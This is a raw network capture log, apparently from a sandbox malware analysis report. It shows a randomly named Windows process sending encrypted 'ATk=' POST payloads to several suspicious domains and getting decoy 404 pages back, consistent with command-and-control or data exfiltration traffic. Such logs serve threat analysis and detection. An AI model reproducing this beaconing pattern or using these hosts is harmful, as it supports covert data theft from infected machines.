Oct 11, 2024 10:01:03.587192059 CEST	540	OUT	GET /o7wc/?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.heeraka.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:01:03.690762997 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:01:03 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 6e 6f 44 72 73 41 4d 69 74 62 4d 47 75 6b 62 47 4b 78 75 56 72 7a 45 67 50 68 33 44 30 47 35 69 76 70 76 6e 41 69 4d 76 77 31 6e 55 6c 50 7a 46 49 78 48 37 6f 78 46 62 72 5a 42 75 79 30 65 6f 34 70 67 61 67 32 79 63 59 74 35 47 75 45 73 61 4a 64 66 71 45 6f 6a 6c 75 44 59 43 77 4d 65 63 4d 42 61 69 5a 55 77 4e 54 6e 39 68 69 46 74 41 4a 69 32 43 30 67 30 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=noDrsAMitbMGukbGKxuVrzEgPh3D0G5ivpvnAiMvw1nUlPzFIxH7oxFbrZBuy0eo4pgag2ycYt5GuEsaJdfqEojluDYCwMecMBaiZUwNTn9hiFtAJi2C0g0=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49823	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:09.181427002 CEST	804	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 4f 68 44 70 50 6b 69 73 63 41 34 75 70 4b 31 63 74 5a 74 48 6c 36 4a 2f 44 75 39 47 63 69 32 4a 42 33 70 79 46 69 54 66 41 59 57 30 51 62 66 4d 33 4c 35 4b 30 31 64 34 50 6f 35 62 36 62 6d 65 72 68 61 4d 6d 2b 37 57 51 6f 41 78 38 30 45 30 56 50 74 54 6e 58 32 44 4f 46 6a 57 35 30 6a 6a 6c 6d 6a 41 50 46 5a 71 31 39 34 42 62 4d 68 37 57 6d 31 67 4d 30 7a 34 5a 59 6c 76 32 56 78 67 32 78 73 76 41 31 39 79 62 65 37 73 5a 69 4b 62 53 69 44 37 6f 4f 6c 74 39 77 76 38 5a 49 4d 44 50 47 6d 73 79 79 37 56 49 30 55 4f 4d 5a 4f 58 55 30 4c 4e 69 51 3d 3d Data Ascii: ATk=/4cWAqWMo/5YOhDpPkiscA4upK1ctZtHl6J/Du9Gci2JB3pyFiTfAYW0QbfM3L5K01d4Po5b6bmerhaMm+7WQoAx80E0VPtTnX2DOFjW50jjlmjAPFZq194BbMh7Wm1gM0z4ZYlv2Vxg2xsvA19ybe7sZiKbSiD7oOlt9wv8ZIMDPGmsyy7VI0UOMZOXU0LNiQ==
Oct 11, 2024 10:01:09.353463888 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:01:09.353528023 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49824	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:11.893918037 CEST	824	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 53 4a 42 57 5a 79 43 67 72 66 48 59 57 30 46 72 66 4e 71 37 35 2f 30 31 59 46 50 71 74 62 36 66 47 65 72 6c 65 4d 6d 4a 50 56 51 34 41 7a 78 55 45 6c 62 76 74 54 6e 58 32 44 4f 46 65 37 35 30 72 6a 6b 58 7a 41 50 68 46 70 2f 64 34 43 50 63 68 37 53 6d 31 6b 4d 30 7a 57 5a 59 56 42 32 58 5a 67 32 78 63 76 52 45 39 7a 42 4f 37 75 64 69 4c 74 55 67 79 73 6e 4d 78 79 2b 68 4c 66 52 71 41 4e 4b 51 33 32 76 41 50 78 4c 6e 49 38 49 70 33 2f 57 32 4b 57 2f 52 6a 2b 54 64 6a 68 70 52 6b 62 43 48 53 37 62 46 73 6c 45 63 38 3d Data Ascii: ATk=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwSJBWZyCgrfHYW0FrfNq75/01YFPqtb6fGerleMmJPVQ4AzxUElbvtTnX2DOFe750rjkXzAPhFp/d4CPch7Sm1kM0zWZYVB2XZg2xcvRE9zBO7udiLtUgysnMxy+hLfRqANKQ32vAPxLnI8Ip3/W2KW/Rj+TdjhpRkbCHS7bFslEc8=
Oct 11, 2024 10:01:12.071983099 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:01:12.072026968 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49825	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:14.725029945 CEST	7973	OUT	POST /53bw/ HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.awesomearv.buzz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.awesomearv.buzz/53bw/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 2f 34 63 57 41 71 57 4d 6f 2f 35 59 49 77 7a 70 49 47 4b 73 49 51 34 68 30 36 31 63 6e 35 74 4c 6c 36 46 2f 44 75 55 4e 63 77 61 4a 42 41 74 79 43 42 72 66 47 59 57 30 45 72 66 49 71 37 35 59 30 78 30 4a 50 71 77 75 36 64 2b 65 71 47 47 4d 75 63 6a 56 65 34 41 7a 75 45 45 31 56 50 74 61 6e 58 6d 48 4f 46 75 37 35 30 72 6a 6b 55 62 41 62 6c 5a 70 35 64 34 42 62 4d 68 2f 57 6d 31 63 4d 33 44 67 5a 63 4a 2f 32 6e 35 67 32 52 4d 76 43 57 56 7a 5a 65 37 6f 61 69 4c 6c 55 67 2f 72 6e 4b 56 45 2b 68 2f 35 52 74 63 4e 4b 6d 32 4f 79 53 58 75 51 32 30 6c 43 4c 7a 57 5a 58 6d 2f 33 32 33 35 5a 73 33 41 69 78 45 30 49 58 57 45 42 31 55 79 59 61 5a 4c 4d 78 39 44 34 77 36 34 62 31 4f 4a 76 50 50 77 47 7a 31 62 65 4f 57 61 53 6e 54 78 66 33 54 46 47 54 61 6d 45 64 79 2b 4b 33 62 73 57 5a 4b 48 6d 6b 6c 74 69 6b 4b 2b 63 44 74 79 70 51 38 2b 63 46 50 78 4c 45 66 4e 75 78 4f 74 32 4a 35 34 72 74 51 77 64 53 46 34 7a 77 4e 47 53 36 53 78 51 69 53 42 6c 56 48 51 43 52 6d 62 78 71 4e 55 6c 48 70 55 54 39 [TRUNCATED] Data Ascii: ATk=/4cWAqWMo/5YIwzpIGKsIQ4h061cn5tLl6F/DuUNcwaJBAtyCBrfGYW0ErfIq75Y0x0JPqwu6d+eqGGMucjVe4AzuEE1VPtanXmHOFu750rjkUbAblZp5d4BbMh/Wm1cM3DgZcJ/2n5g2RMvCWVzZe7oaiLlUg/rnKVE+h/5RtcNKm2OySXuQ20lCLzWZXm/3235Zs3AixE0IXWEB1UyYaZLMx9D4w64b1OJvPPwGz1beOWaSnTxf3TFGTamEdy+K3bsWZKHmkltikK+cDtypQ8+cFPxLEfNuxOt2J54rtQwdSF4zwNGS6SxQiSBlVHQCRmbxqNUlHpUT9jL+2DHHpa1KZBsILdInA17JRl0sUiOvablvuvlApJyzJtySlISJFln/lGWTgDfnlkZUW6KYirfyRl9ctKQuX0MmJ0FvmgjNQgOVqKFUglOWqSz/VMDH1/xskrDjLWJimlqE4LDj9KWyGqH6AkL/NmmVm6Jdh+1glMcSEkjPbETChcIU54VL9Ov2vhcJmVA8ffCoDqz6+LizVjMJ7N3lf9Bdwgf35YLIi/O4Ffaeep08njDNwfmKHndIM+V/egr1qakD23UT4OW2ecxHKa4lmHCrnC0Iao/sr0pDr4DVpvP53f6oAmqIthJjtWxdXEJeIakPiIo63mbkAfPKHO7O07aCn8JYEtrpkTYJheon/mQWn3WeB7QAkNKF6isNBTzdvMTTjh5C64DL0e+sRRkg4dVSSfiw2ZtvzpyMgEnNpYzWid494NdAAKhyXAz/UIDpgqCYb0kLmhTxgtVOkq+aylw5U9C9q8o2SFNCu4aob3qA1umKDhSbNgLH5xoHADr5uMHP5MVADU3tg6KSGEy4VBen4PcKm6CNeRrKh18kmXbO518kVWVNgFVlR9Az++xjFaxOiT9m5kavo0NQAoQMz/CEKbESEpSvN/y1+wiWZdAoA1XQ0Pr0BMTguaznZXrOXEfY0l3GMdYpRHKIeKbVzBRXbw3vnmHirlk [TRUNCATED]
Oct 11, 2024 10:01:14.961241007 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cd104a-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc(aL`!I> [TRUNCATED]
Oct 11, 2024 10:01:14.961304903 CEST	317	IN	Data Raw: f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 27 07 2f 88 08 5d b8 dd 9d c3 da 74 74 30 c5 f1 c0 04 7b 7b cc 88 10 22 a1 98 47 c4 0f 38 8a c0 41 97 ae 98 04 90 82 7e c6 a8 8b de e5 5b 46 90 0d 8e 03 08 19 Data Ascii: wlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5LznQVT)F[EG{^kTs0N[JJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49826	161.97.168.245	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:17.421262026 CEST	543	OUT	GET /53bw/?ATk=y602DfOxy8k4aDGeL2LafnkTvLx8g5VEvf5zKPNxBw/5ZQtnSgrsDIOhG/LT94BV3SRTeLh29bGmgRGfpvfkXpkrxRE8C/BpnF37AgHX90StwlvjASc62/Y=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.awesomearv.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:01:17.592387915 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cd104a-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 11, 2024 10:01:17.592458963 CEST	1289	IN	Data Raw: 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 Data Ascii: ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25
Oct 11, 2024 10:01:17.592529058 CEST	592	IN	Data Raw: 37 20 30 2d 35 38 2e 30 30 32 2d 36 30 2e 31 36 35 2d 31 30 32 2d 31 31 36 2e 35 33 31 2d 31 30 32 7a 4d 32 35 36 20 33 33 38 63 2d 32 35 2e 33 36 35 20 30 2d 34 36 20 32 30 2e 36 33 35 2d 34 36 20 34 36 20 30 20 32 35 2e 33 36 34 20 32 30 2e 36 Data Ascii: 7 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49827	65.21.196.90	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:23.243983984 CEST	798	OUT	POST /2ncs/ HTTP/1.1 Host: www.030002252.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.030002252.xyz Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.030002252.xyz/2ncs/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 50 2f 5a 59 6b 6a 4c 42 55 59 45 76 74 38 53 45 52 52 35 6f 65 32 71 34 74 45 4f 34 34 33 76 76 55 33 69 6c 67 39 50 63 55 42 75 30 2b 45 59 6c 62 75 68 76 36 72 6c 4e 6b 66 4d 49 76 4a 49 51 49 51 39 56 54 49 49 31 39 50 4a 6a 66 54 4b 4a 4c 61 59 2f 69 51 67 4f 45 6c 44 34 47 76 44 5a 4e 33 72 49 6c 6e 47 67 4e 73 37 39 57 7a 46 72 4c 33 70 48 73 35 47 50 57 2b 6c 63 68 37 35 79 69 55 30 48 64 50 41 34 4d 45 53 58 43 36 6a 69 43 71 42 39 30 30 59 6e 72 6c 6f 56 6e 78 50 65 50 46 75 71 72 32 4b 77 31 74 57 76 56 43 6b 72 4a 50 53 4d 49 2f 6f 45 34 72 71 52 52 63 4c 41 4e 77 3d 3d Data Ascii: ATk=P/ZYkjLBUYEvt8SERR5oe2q4tEO443vvU3ilg9PcUBu0+EYlbuhv6rlNkfMIvJIQIQ9VTII19PJjfTKJLaY/iQgOElD4GvDZN3rIlnGgNs79WzFrL3pHs5GPW+lch75yiU0HdPA4MESXC6jiCqB900YnrloVnxPePFuqr2Kw1tWvVCkrJPSMI/oE4rqRRcLANw==
